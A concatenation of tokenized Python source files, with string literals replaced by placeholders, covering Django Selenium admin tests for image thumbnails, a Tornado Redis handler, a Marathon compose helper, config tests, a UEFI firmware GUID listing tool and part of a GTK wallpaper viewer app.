<EOL> el . click ( ) <EOL> with self . switch_to_popup_window ( ) : <EOL> with self . visible_selector ( '<STR_LIT>' ) as el : <EOL> el . send_keys ( os . path . join ( self . TEST_IMG_DIR , '<STR_LIT>' ) ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> el . click ( ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> el . click ( ) <EOL> browser . find_element_by_xpath ( '<STR_LIT>' % author . pk ) . click ( ) <EOL> browser . find_element_by_xpath ( '<STR_LIT>' ) . click ( ) <EOL> article = Article . objects . all ( ) [ <NUM_LIT:0> ] <EOL> lead_sizes = list ( Size . flatten ( Article . LEAD_IMAGE_SIZES ) ) <EOL> alt_sizes = list ( Size . flatten ( Article . ALT_IMAGE_SIZES ) ) <EOL> self . assertTrue ( article . lead_image . path . endswith ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( len ( article . lead_image . related_object . thumbs . all ( ) ) , len ( lead_sizes ) ) <EOL> self . assertTrue ( article . alt_image . path . endswith ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( len ( article . alt_image . related_object . thumbs . all ( ) ) , len ( alt_sizes ) ) <EOL> def test_changeform_single_image ( self ) : <EOL> author = Author . objects . create ( name = "<STR_LIT>" , <EOL> headshot = os . path . join ( self . TEST_IMG_DIR_RELATIVE , '<STR_LIT>' ) ) <EOL> author . headshot . generate_thumbs ( ) <EOL> url = reverse ( '<STR_LIT>' , args = ( author . pk , ) ) <EOL> browser = self . selenium <EOL> self . admin_login ( "<STR_LIT>" , "<STR_LIT>" , login_url = url ) <EOL> elem = browser . find_element_by_id ( '<STR_LIT>' ) <EOL> elem . clear ( ) <EOL> elem . send_keys ( "<STR_LIT>" ) <EOL> old_page_id = browser . find_element_by_tag_name ( '<STR_LIT:html>' ) . id <EOL> browser . find_element_by_xpath ( '<STR_LIT>' ) . click ( ) <EOL> self . wait_until ( lambda b : b . find_element_by_tag_name ( '<STR_LIT:html>' ) . id != old_page_id ) <EOL> self . assertEqual ( Author . objects . get ( pk = author . pk ) . name , '<STR_LIT>' ) <EOL> def test_changeform_multiple_images ( self ) : <EOL> author = Author . objects . create ( name = "<STR_LIT>" ) <EOL> article = Article . objects . create ( title = "<STR_LIT:title>" , author = author , <EOL> lead_image = os . path . join ( self . TEST_IMG_DIR_RELATIVE , '<STR_LIT>' ) , <EOL> alt_image = os . path . join ( self . TEST_IMG_DIR_RELATIVE , '<STR_LIT>' ) ) <EOL> article . lead_image . generate_thumbs ( ) <EOL> article . alt_image . generate_thumbs ( ) <EOL> url = reverse ( '<STR_LIT>' , args = ( article . pk , ) ) <EOL> browser = self . selenium <EOL> self . admin_login ( "<STR_LIT>" , "<STR_LIT>" , login_url = url ) <EOL> elem = browser . find_element_by_id ( '<STR_LIT>' ) <EOL> elem . clear ( ) <EOL> elem . send_keys ( "<STR_LIT>" ) <EOL> old_page_id = browser . find_element_by_tag_name ( '<STR_LIT:html>' ) . id <EOL> browser . find_element_by_xpath ( '<STR_LIT>' ) . click ( ) <EOL> self . wait_until ( lambda b : b . find_element_by_tag_name ( '<STR_LIT:html>' ) . id != old_page_id ) <EOL> self . assertEqual ( Article . objects . get ( pk = article . pk ) . title , '<STR_LIT>' ) <EOL> def test_changeform_with_optional_sizes_small_image ( self ) : <EOL> test_a = TestForOptionalSizes . objects . create ( slug = '<STR_LIT:a>' ) <EOL> self . admin_login ( "<STR_LIT>" , "<STR_LIT>" , <EOL> login_url = reverse ( '<STR_LIT>' , args = [ test_a . pk ] ) ) <EOL> self . wait_page_loaded ( ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> self . selenium . execute_script ( '<STR_LIT>' % el . location [ '<STR_LIT:y>' ] ) <EOL> el . click ( ) <EOL> with self . switch_to_popup_window ( ) : <EOL> with self . visible_selector ( '<STR_LIT>' ) as el : <EOL> el . send_keys ( os . path . join ( self . TEST_IMG_DIR , '<STR_LIT>' ) ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> el . click ( ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> el . click ( ) <EOL> self . selenium . find_element_by_xpath ( '<STR_LIT>' ) . click ( ) <EOL> self . wait_page_loaded ( ) <EOL> test_a = TestForOptionalSizes . objects . get ( slug = '<STR_LIT:a>' ) <EOL> image = test_a . image . related_object <EOL> num_thumbs = len ( image . thumbs . all ( ) ) <EOL> self . assertEqual ( num_thumbs , <NUM_LIT:1> , "<STR_LIT>" % num_thumbs ) <EOL> def test_changeform_with_optional_sizes_large_image ( self ) : <EOL> test_a = TestForOptionalSizes . objects . create ( slug = '<STR_LIT:a>' ) <EOL> self . admin_login ( "<STR_LIT>" , "<STR_LIT>" , <EOL> login_url = reverse ( '<STR_LIT>' , args = [ test_a . pk ] ) ) <EOL> self . wait_page_loaded ( ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> self . selenium . execute_script ( '<STR_LIT>' % el . location [ '<STR_LIT:y>' ] ) <EOL> el . click ( ) <EOL> with self . switch_to_popup_window ( ) : <EOL> with self . visible_selector ( '<STR_LIT>' ) as el : <EOL> el . send_keys ( os . path . join ( self . TEST_IMG_DIR , '<STR_LIT>' ) ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> el . click ( ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> el . click ( ) <EOL> self . selenium . find_element_by_xpath ( '<STR_LIT>' ) . click ( ) <EOL> self . wait_page_loaded ( ) <EOL> test_a = TestForOptionalSizes . objects . get ( slug = '<STR_LIT:a>' ) <EOL> image = test_a . image . related_object <EOL> num_thumbs = len ( image . thumbs . all ( ) ) <EOL> self . assertEqual ( num_thumbs , <NUM_LIT:2> , "<STR_LIT>" % num_thumbs ) <EOL> def test_orphaned_thumbs_after_delete ( self ) : <EOL> test_a = TestForOrphanedThumbs . objects . create ( slug = '<STR_LIT:a>' ) <EOL> self . admin_login ( "<STR_LIT>" , "<STR_LIT>" , <EOL> login_url = reverse ( '<STR_LIT>' , args = [ test_a . pk ] ) ) <EOL> self . wait_page_loaded ( ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> self . selenium . execute_script ( '<STR_LIT>' % el . location [ '<STR_LIT:y>' ] ) <EOL> el . click ( ) <EOL> with self . switch_to_popup_window ( ) : <EOL> with self . visible_selector ( '<STR_LIT>' ) as el : <EOL> el . send_keys ( os . path . join ( self . TEST_IMG_DIR , '<STR_LIT>' ) ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> el . click ( ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> el . click ( ) <EOL> with self . clickable_selector ( '<STR_LIT>' ) as el : <EOL> el . click ( ) <EOL> self . selenium . find_element_by_xpath ( '<STR_LIT>' ) . click ( ) <EOL> self . wait_page_loaded ( ) <EOL> test_a = TestForOrphanedThumbs . objects . get ( slug = '<STR_LIT:a>' ) <EOL> test_a . delete ( ) <EOL> num_thumbs = len ( Thumb . objects . all ( ) ) <EOL> self . assertEqual ( num_thumbs , <NUM_LIT:0> , "<STR_LIT>" ) </s>
<s> import os <EOL> import sys <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> os . environ . setdefault ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> from django . core . management import execute_from_command_line <EOL> execute_from_command_line ( sys . argv ) </s>
<s> from tornado . ioloop import IOLoop <EOL> from tornado . web import RequestHandler , Application , url <EOL> import tornado . gen <EOL> import tornadis <EOL> import logging <EOL> logging . basicConfig ( level = logging . WARNING ) <EOL> POOL = tornadis . ClientPool ( max_size = <NUM_LIT:15> ) <EOL> class HelloHandler ( RequestHandler ) : <EOL> @ tornado . gen . coroutine <EOL> def get ( self ) : <EOL> with ( yield POOL . connected_client ( ) ) as client : <EOL> reply = yield client . call ( "<STR_LIT>" ) <EOL> if not isinstance ( reply , tornadis . TornadisException ) : <EOL> self . write ( "<STR_LIT>" % reply ) <EOL> self . finish ( ) <EOL> def make_app ( ) : <EOL> return Application ( [ <EOL> url ( r"<STR_LIT:/>" , HelloHandler ) , <EOL> ] ) <EOL> def main ( ) : <EOL> app = make_app ( ) <EOL> app . listen ( <NUM_LIT> ) <EOL> IOLoop . current ( ) . start ( ) <EOL> main ( ) </s>
<s> import errno <EOL> from functools import wraps <EOL> import os <EOL> import signal <EOL> import sys <EOL> import re <EOL> import time <EOL> import requests <EOL> from compose . cli import command <EOL> class TimeoutError ( Exception ) : <EOL> pass <EOL> def timeout ( seconds = <NUM_LIT:10> , error_message = os . strerror ( errno . ETIME ) ) : <EOL> def decorator ( func ) : <EOL> def _handle_timeout ( signum , frame ) : <EOL> raise TimeoutError ( error_message ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> signal . signal ( signal . SIGALRM , _handle_timeout ) <EOL> signal . alarm ( seconds ) <EOL> try : <EOL> result = func ( * args , ** kwargs ) <EOL> finally : <EOL> signal . alarm ( <NUM_LIT:0> ) <EOL> return result <EOL> return wraps ( func ) ( wrapper ) <EOL> return decorator <EOL> @ timeout ( <NUM_LIT:30> ) <EOL> def wait_for_marathon ( ) : <EOL> """<STR_LIT>""" <EOL> marathon_service = get_marathon_connection_string ( ) <EOL> while True : <EOL> print '<STR_LIT>' % marathon_service <EOL> try : <EOL> response = requests . get ( <EOL> '<STR_LIT>' % marathon_service , timeout = <NUM_LIT:2> ) <EOL> except ( <EOL> requests . exceptions . ConnectionError , <EOL> requests . exceptions . Timeout , <EOL> ) : <EOL> time . sleep ( <NUM_LIT:2> ) <EOL> continue <EOL> if response . status_code == <NUM_LIT:200> : <EOL> print "<STR_LIT>" <EOL> break <EOL> def get_compose_service ( service_name ) : <EOL> """<STR_LIT>""" <EOL> cmd = command . Command ( ) <EOL> project = cmd . get_project ( cmd . get_config_path ( ) ) <EOL> return project . get_service ( service_name ) <EOL> def get_marathon_connection_string ( ) : <EOL> if '<STR_LIT>' in os . environ . get ( '<STR_LIT>' ) : <EOL> return '<STR_LIT>' <EOL> else : <EOL> service_port = get_service_internal_port ( '<STR_LIT>' ) <EOL> local_port = get_compose_service ( '<STR_LIT>' ) . get_container ( ) . get_local_port ( service_port ) <EOL> if sys . platform == '<STR_LIT>' : <EOL> m = re . match ( "<STR_LIT>" , os . environ [ "<STR_LIT>" ] ) <EOL> local_port = "<STR_LIT>" . format ( m . group ( <NUM_LIT:2> ) , local_port . split ( "<STR_LIT::>" ) [ <NUM_LIT:1> ] ) <EOL> return local_port <EOL> def get_service_internal_port ( service_name ) : <EOL> """<STR_LIT>""" <EOL> return get_compose_service ( service_name ) . options [ '<STR_LIT>' ] [ <NUM_LIT:0> ] </s>
<s> import os <EOL> import unittest <EOL> import figgypy . config <EOL> class TestConfig ( unittest . TestCase ) : <EOL> def test_config_pass_on_int ( self ) : <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> c = figgypy . config . Config ( '<STR_LIT>' ) <EOL> self . assertEqual ( c . number , <NUM_LIT:1> ) <EOL> def test_config_load_with_gpg ( self ) : <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> c = figgypy . config . Config ( '<STR_LIT>' ) <EOL> self . assertEqual ( c . db [ '<STR_LIT:host>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( c . db [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_config_load_without_gpg ( self ) : <EOL> figgypy . decrypt . GPG_IMPORTED = False <EOL> c = figgypy . config . Config ( '<STR_LIT>' ) <EOL> encrypted_password = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT:\n>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertEqual ( c . db [ '<STR_LIT:host>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( c . db [ '<STR_LIT>' ] . rstrip ( '<STR_LIT:\n>' ) , encrypted_password . rstrip ( '<STR_LIT:\n>' ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import os <EOL> from ConfigParser import SafeConfigParser , NoOptionError <EOL> def abs_path ( path ) : <EOL> path = os . path . expanduser ( path ) <EOL> path = os . path . abspath ( path ) <EOL> return path <EOL> def config_option ( fn , section , option ) : <EOL> try : <EOL> return fn ( section , option ) <EOL> except NoOptionError : <EOL> return None <EOL> def config_parser ( path ) : <EOL> path = abs_path ( path ) <EOL> config = SafeConfigParser ( ) <EOL> with open ( path ) as fp : <EOL> config . readfp ( fp ) <EOL> return config </s>
<s> import argparse <EOL> from uefi_firmware . uefi import * <EOL> from uefi_firmware . utils import * <EOL> from uefi_firmware . flash import FlashDescriptor <EOL> from uefi_firmware . guids import get_guid_name <EOL> def debug ( text , cr = True , gen = False ) : <EOL> if args . generate is not None and not gen : <EOL> return <EOL> if args . generate is None and gen : <EOL> return <EOL> elif cr : <EOL> print text <EOL> else : <EOL> print text , <EOL> def label_as_guid_name ( label ) : <EOL> if args . generate is None : <EOL> return None <EOL> def is_cap ( c ) : <EOL> if ord ( c ) >= ord ( '<STR_LIT:A>' ) and ord ( c ) <= ord ( '<STR_LIT>' ) : <EOL> return True <EOL> return False <EOL> producer = "<STR_LIT>" <EOL> for i in xrange ( len ( label ) ) : <EOL> if label [ i ] == '<STR_LIT:_>' : <EOL> continue <EOL> if i > <NUM_LIT:0> : <EOL> if is_cap ( label [ i ] ) and not is_cap ( label [ i - <NUM_LIT:1> ] ) : <EOL> producer += "<STR_LIT:_>" <EOL> producer += label [ i ] <EOL> if len ( producer ) == <NUM_LIT:0> : <EOL> return None <EOL> if producer . lower ( ) . find ( args . generate . lower ( ) ) != <NUM_LIT:0> : <EOL> producer = "<STR_LIT>" % ( args . generate , producer ) <EOL> return "<STR_LIT>" % producer . upper ( ) . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> def list_uefi_guids ( base_object ) : <EOL> base_objects = base_object . iterate_objects ( False ) <EOL> objects = flatten_firmware_objects ( base_objects ) <EOL> guids = { } <EOL> for firmware_object in objects : <EOL> guid = firmware_object [ "<STR_LIT>" ] if "<STR_LIT>" in firmware_object else None <EOL> if guid is None : <EOL> continue <EOL> if firmware_object [ "<STR_LIT>" ] in [ v for k , v in FIRMWARE_GUIDED_GUIDS . iteritems ( ) ] : <EOL> guid = firmware_object [ "<STR_LIT>" ] [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> if len ( guid ) == <NUM_LIT:0> : <EOL> continue <EOL> if guid not in guids . keys ( ) : <EOL> guids [ guid ] = { "<STR_LIT>" : [ ] , "<STR_LIT>" : [ ] } <EOL> if len ( firmware_object [ "<STR_LIT:label>" ] ) > <NUM_LIT:0> and firmware_object [ "<STR_LIT:label>" ] not in guids [ guid ] [ "<STR_LIT>" ] : <EOL> guids [ guid ] [ "<STR_LIT>" ] . append ( firmware_object [ "<STR_LIT:label>" ] ) <EOL> if firmware_object [ "<STR_LIT:type>" ] not in guids [ guid ] [ "<STR_LIT>" ] : <EOL> guids [ guid ] [ "<STR_LIT>" ] . append ( firmware_object [ "<STR_LIT:type>" ] ) <EOL> guid_list = guids . keys ( ) <EOL> guid_list . sort ( ) <EOL> for guid in guid_list : <EOL> guid_name = get_guid_name ( s2aguid ( guid ) ) <EOL> label = "<STR_LIT>" <EOL> if len ( guids [ guid ] [ "<STR_LIT>" ] ) >= <NUM_LIT:1> : <EOL> label = guids [ guid ] [ "<STR_LIT>" ] [ <NUM_LIT:0> ] <EOL> if guid_name is not None : <EOL> debug ( guid_name , False ) <EOL> else : <EOL> debug ( "<STR_LIT>" , False ) <EOL> generated_label = label_as_guid_name ( label ) <EOL> if generated_label is not None or args . unknowns : <EOL> if args . unknowns and generated_label is None : <EOL> generated_label = "<STR_LIT>" <EOL> debug ( "<STR_LIT>" % <EOL> ( generated_label , s2aguid ( guid ) ) , True , True ) <EOL> debug ( green ( guid ) , False ) <EOL> debug ( "<STR_LIT:U+002CU+0020>" . join ( [ purple ( _label ) <EOL> for _label in guids [ guid ] [ "<STR_LIT>" ] ] ) , False ) <EOL> debug ( "<STR_LIT:U+002CU+0020>" . join ( [ blue ( guid_type ) <EOL> for guid_type in guids [ guid ] [ "<STR_LIT>" ] ] ) ) <EOL> pass <EOL> def brute_search_volumes ( data ) : <EOL> volumes = search_firmware_volumes ( data ) <EOL> for index in volumes : <EOL> parse_firmware_volume ( data [ index - <NUM_LIT> : ] , name = index - <NUM_LIT> ) <EOL> pass <EOL> def brute_search_flash ( data ) : <EOL> descriptors = search_flash_descriptor ( data ) <EOL> for index in descriptors : <EOL> parse_flash_descriptor ( data [ index : ] ) <EOL> pass <EOL> def parse_firmware_capsule ( data , name = <NUM_LIT:0> ) : <EOL> firmware_capsule = FirmwareCapsule ( data , name ) <EOL> if not firmware_capsule . valid_header : <EOL> return <EOL> firmware_capsule . process ( ) <EOL> pass <EOL> def parse_firmware_volume ( data , name = <NUM_LIT:0> ) : <EOL> firmware_volume = FirmwareVolume ( data , name ) <EOL> firmware_volume . process ( ) <EOL> list_uefi_guids ( firmware_volume ) <EOL> def parse_flash_descriptor ( data ) : <EOL> flash = FlashDescriptor ( data ) <EOL> if not flash . valid_header : <EOL> return <EOL> flash . process ( ) <EOL> list_uefi_guids ( flash ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> parser = argparse . ArgumentParser ( <EOL> description = "<STR_LIT>" ) <EOL> parser . add_argument ( <EOL> '<STR_LIT:-c>' , "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , "<STR_LIT>" , default = None , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( "<STR_LIT:file>" , help = "<STR_LIT>" ) <EOL> args = parser . parse_args ( ) <EOL> try : <EOL> with open ( args . file , '<STR_LIT:rb>' ) as fh : <EOL> input_data = fh . read ( ) <EOL> except Exception , e : <EOL> print "<STR_LIT>" % ( args . file , str ( e ) ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if args . brute : <EOL> if args . flash : <EOL> brute_search_flash ( input_data ) <EOL> else : <EOL> brute_search_volumes ( input_data ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if args . capsule : <EOL> parse_firmware_capsule ( input_data ) <EOL> elif args . flash : <EOL> parse_flash_descriptor ( input_data ) <EOL> else : <EOL> parse_firmware_volume ( input_data ) </s>
<s> '''<STR_LIT>''' <EOL> from webilder import AboutDialog <EOL> from webilder import config_dialog <EOL> from webilder import DownloadDialog <EOL> from webilder import infofile <EOL> from webilder import wbz_handler <EOL> from webilder import WebilderFullscreen <EOL> from webilder . thumbs import ThumbLoader <EOL> from webilder . uitricks import UITricks , open_browser <EOL> import sys , os , time , glob , gc <EOL> import optparse <EOL> import gtk , gobject <EOL> import pkg_resources <EOL> try : <EOL> import gnomevfs <EOL> except ImportError : <EOL> gnomevfs = None <EOL> from webilder . config import config , set_wallpaper , reload_config <EOL> IV_TEXT_COLUMN = <NUM_LIT:0> <EOL> IV_PIXBUF_COLUMN = <NUM_LIT:1> <EOL> IV_DATA_COLUMN = <NUM_LIT:2> <EOL> TV_TEXT_COLUMN = <NUM_LIT:0> <EOL> TV_PATH_COLUMN = <NUM_LIT:1> <EOL> TV_KIND_COLUMN = <NUM_LIT:2> <EOL> TV_KIND_DIR = "<STR_LIT>" <EOL> TV_KIND_RECENT = "<STR_LIT>" <EOL> EMPTY_PICTURE = gtk . gdk . pixbuf_new_from_file_at_size ( <EOL> pkg_resources . resource_filename ( __name__ , '<STR_LIT>' ) , <NUM_LIT> , <NUM_LIT> ) <EOL> def connect_to_menu ( wtree , item , callback ) : <EOL> """<STR_LIT>""" <EOL> wtree . get_widget ( item ) . connect ( '<STR_LIT>' , callback ) <EOL> class WebilderDesktopWindow ( UITricks ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> UITricks . __init__ ( self , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> self . sort_combo . set_active ( <NUM_LIT:1> ) <EOL> renderer = gtk . CellRendererText ( ) <EOL> self . tree . append_column ( <EOL> column = gtk . TreeViewColumn ( "<STR_LIT>" , renderer , markup = <NUM_LIT:0> ) ) <EOL> self . tree . columns_autosize ( ) <EOL> self . load_collection_tree ( config . get ( '<STR_LIT>' ) ) <EOL> self . iconview . set_pixbuf_column ( IV_PIXBUF_COLUMN ) <EOL> self . iconview . set_markup_column ( IV_TEXT_COLUMN ) <EOL> self . on_iconview_handle_selection_changed ( self . iconview ) <EOL> self . collection_monitor = dict ( monitor = None , dir = None ) <EOL> self . image_popup = ImagePopup ( self ) <EOL> self . download_dialog = None <EOL> if gnomevfs : <EOL> self . tree_monitor = gnomevfs . monitor_add ( <EOL> config . get ( '<STR_LIT>' ) , <EOL> gnomevfs . MONITOR_DIRECTORY , <EOL> self . collection_tree_changed ) <EOL> self . restore_window_state ( ) <EOL> self . top_widget . show_all ( ) <EOL> self . hand_cursor = gtk . gdk . Cursor ( gtk . gdk . HAND2 ) <EOL> def load_collection_tree ( self , root ) : <EOL> """<STR_LIT>""" <EOL> model = gtk . TreeStore ( gobject . TYPE_STRING , gobject . TYPE_STRING , <EOL> gobject . TYPE_STRING ) <EOL> model . append ( None , ( _ ( '<STR_LIT>' ) , '<STR_LIT>' , TV_KIND_RECENT ) ) <EOL> dirlist = os . listdir ( root ) <EOL> for entry in sorted ( dirlist ) : <EOL> fullpath = os . path . join ( root , entry ) <EOL> entry = html_escape ( entry ) <EOL> if os . path . isdir ( fullpath ) : <EOL> model . append ( None , ( entry , fullpath , TV_KIND_DIR ) ) <EOL> self . tree . set_model ( model ) <EOL> def on_tree_handle_selection_changed ( self , tree_selection ) : <EOL> """<STR_LIT>""" <EOL> if not tree_selection : <EOL> return <EOL> model , selection = tree_selection . get_selected_rows ( ) <EOL> for path in selection : <EOL> iterator = model . get_iter ( path ) <EOL> rootdir = self . tree . get_model ( ) . get_value ( iterator , TV_PATH_COLUMN ) <EOL> kind = self . tree . get_model ( ) . get_value ( iterator , TV_KIND_COLUMN ) <EOL> if kind == TV_KIND_DIR : <EOL> self . load_directory_collection ( rootdir ) <EOL> else : <EOL> self . load_recent_photos ( ) <EOL> def load_directory_collection ( self , dirname ) : <EOL> """<STR_LIT>""" <EOL> images = glob . glob ( os . path . join ( dirname , '<STR_LIT>' ) ) <EOL> png_images = glob . glob ( os . path . join ( dirname , '<STR_LIT>' ) ) <EOL> images . extend ( png_images ) <EOL> self . load_collection ( images , monitor_dir = dirname ) <EOL> def load_recent_photos ( self ) : <EOL> """<STR_LIT>""" <EOL> images = glob . glob ( <EOL> os . path . join ( config . get ( '<STR_LIT>' ) , '<STR_LIT:*>' , '<STR_LIT>' ) ) <EOL> png_images = glob . glob ( <EOL> os . path . join ( config . get ( '<STR_LIT>' ) , '<STR_LIT:*>' , '<STR_LIT>' ) ) <EOL> images . extend ( png_images ) <EOL> recent_time = time . time ( ) - <NUM_LIT> * <NUM_LIT> <EOL> images = [ ( os . path . getmtime ( fname ) , fname ) for fname in images ] <EOL> images = [ pair for pair in images if pair [ <NUM_LIT:0> ] > recent_time ] <EOL> images = [ pair [ <NUM_LIT:1> ] for pair in sorted ( images , reverse = True ) ] <EOL> self . load_collection ( images ) <EOL> def load_collection ( self , images , monitor_dir = None ) : <EOL> """<STR_LIT>""" <EOL> model = gtk . ListStore ( gobject . TYPE_STRING , gtk . gdk . Pixbuf , <EOL> gobject . TYPE_PYOBJECT ) <EOL> image_list = [ ] <EOL> for image in images : <EOL> dirname , filename = os . path . split ( image ) <EOL> basename , ext = os . path . splitext ( filename ) <EOL> thumb = os . path . join ( dirname , <EOL> '<STR_LIT>' , basename + '<STR_LIT>' + ext ) <EOL> info_file = os . path . join ( dirname , basename ) + '<STR_LIT>' <EOL> inf = infofile . parse_info_file ( info_file ) <EOL> title = inf . get ( '<STR_LIT:title>' , basename ) <EOL> album = inf . get ( '<STR_LIT>' , dirname ) <EOL> credit = inf . get ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) <EOL> tags = inf . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> title = html_escape ( title ) <EOL> album = html_escape ( album ) <EOL> credit = html_escape ( credit ) <EOL> tags = html_escape ( tags ) <EOL> data = dict ( title = title , <EOL> filename = image , <EOL> thumb = thumb , <EOL> inf = inf , <EOL> info_file = info_file , <EOL> album = album , <EOL> tags = tags , <EOL> file_time = os . path . getctime ( image ) , <EOL> credit = credit ) <EOL> if len ( title ) > <NUM_LIT> : <EOL> title = title [ : <NUM_LIT> ] + '<STR_LIT>' <EOL> if <NUM_LIT:0> <= time . time ( ) - os . path . getmtime ( image ) < <NUM_LIT> * <NUM_LIT> : <EOL> title = _ ( '<STR_LIT>' ) % title <EOL> position = model . append ( ( title , EMPTY_PICTURE , data ) ) <EOL> image_list . append ( dict ( <EOL> position = position , <EOL> data = data ) ) <EOL> old_model = self . iconview . get_model ( ) <EOL> if old_model is not None : <EOL> old_model . clear ( ) <EOL> self . sort_photos ( model ) <EOL> self . iconview . set_model ( model ) <EOL> gobject . idle_add ( ThumbLoader ( self . iconview , model , <EOL> reversed ( image_list ) ) ) <EOL> self . on_iconview_handle_selection_changed ( self . iconview ) <EOL> if gnomevfs : <EOL> if self . collection_monitor [ '<STR_LIT>' ] is not None : <EOL> gobject . idle_add ( gnomevfs . monitor_cancel , <EOL> self . collection_monitor [ '<STR_LIT>' ] ) <EOL> self . collection_monitor = dict ( monitor = None , dir = None ) <EOL> if monitor_dir : <EOL> self . collection_monitor [ '<STR_LIT>' ] = monitor_dir <EOL> self . collection_monitor [ '<STR_LIT>' ] = gnomevfs . monitor_add ( <EOL> monitor_dir , <EOL> gnomevfs . MONITOR_DIRECTORY , <EOL> self . collection_directory_changed ) <EOL> gc . collect ( ) <EOL> def on_set_as_wallpaper_handle_activate ( self , _menu_item ) : <EOL> """<STR_LIT>""" <EOL> selected = self . iconview . get_selected_items ( ) <EOL> if selected : <EOL> selected = selected [ - <NUM_LIT:1> ] <EOL> if selected : <EOL> self . on_iconview_handle_item_activated ( <EOL> self . iconview , <EOL> selected ) <EOL> def on_iconview_handle_item_activated ( self , icon_view , path ) : <EOL> """<STR_LIT>""" <EOL> iterator = icon_view . get_model ( ) . get_iter ( path ) <EOL> data = icon_view . get_model ( ) . get_value ( iterator , IV_DATA_COLUMN ) <EOL> set_wallpaper ( data [ '<STR_LIT:filename>' ] ) <EOL> gc . collect ( ) <EOL> def on_view_fullscreen_handle_activate ( self , _menu_item ) : <EOL> """<STR_LIT>""" <EOL> selected = self . iconview . get_selected_items ( ) <EOL> if selected : <EOL> selected = selected [ - <NUM_LIT:1> ] <EOL> path = selected <EOL> iterator = self . iconview . get_model ( ) . get_iter ( path ) <EOL> data = self . iconview . get_model ( ) . get_value ( iterator , <EOL> IV_DATA_COLUMN ) <EOL> WebilderFullscreen . FullscreenViewer ( self . top_widget , data ) . run ( ) <EOL> gc . collect ( ) <EOL> def on_download_photos_handle_activate ( self , _menu_item ) : <EOL> """<STR_LIT>""" <EOL> def remove_reference ( * _args ) : <EOL> """<STR_LIT>""" <EOL> self . download_dialog = None <EOL> if not self . download_dialog : <EOL> self . download_dialog = DownloadDialog . DownloadProgressDialog ( config ) <EOL> self . download_dialog . top_widget . connect ( '<STR_LIT>' , remove_reference ) <EOL> self . download_dialog . show ( ) <EOL> else : <EOL> self . download_dialog . top_widget . present ( ) <EOL> def on_iconview_handle_selection_changed ( self , icon_view ) : <EOL> """<STR_LIT>""" <EOL> selection = icon_view . get_selected_items ( ) <EOL> if len ( selection ) > <NUM_LIT:0> : <EOL> selection = selection [ - <NUM_LIT:1> ] <EOL> title = album = credit = tags = "<STR_LIT>" <EOL> if selection : <EOL> iterator = icon_view . get_model ( ) . get_iter ( selection ) <EOL> data = icon_view . get_model ( ) . get_value ( iterator , IV_DATA_COLUMN ) <EOL> title = "<STR_LIT>" % data [ '<STR_LIT:title>' ] <EOL> album = data [ '<STR_LIT>' ] <EOL> credit = data [ '<STR_LIT>' ] <EOL> tags = data [ '<STR_LIT>' ] <EOL> self . photo_title . set_markup ( title ) <EOL> self . photo_album . set_markup ( album ) <EOL> self . photo_credit . set_markup ( credit ) <EOL> self . photo_tags . set_markup ( tags ) <EOL> def collection_directory_changed ( self , * _args ) : <EOL> """<STR_LIT>""" <EOL> self . on_tree_handle_selection_changed ( self . tree . get_selection ( ) ) <EOL> def on_preferences_handle_activate ( self , _menu_item ) : <EOL> """<STR_LIT>""" <EOL> configure ( ) <EOL> def on_iconview_handle_button_press_event ( self , icon_view , event ) : <EOL> """<STR_LIT>""" <EOL> if event . button == <NUM_LIT:3> : <EOL> xpos , ypos = [ int ( event . x ) , int ( event . y ) ] <EOL> path = icon_view . get_path_at_pos ( xpos , 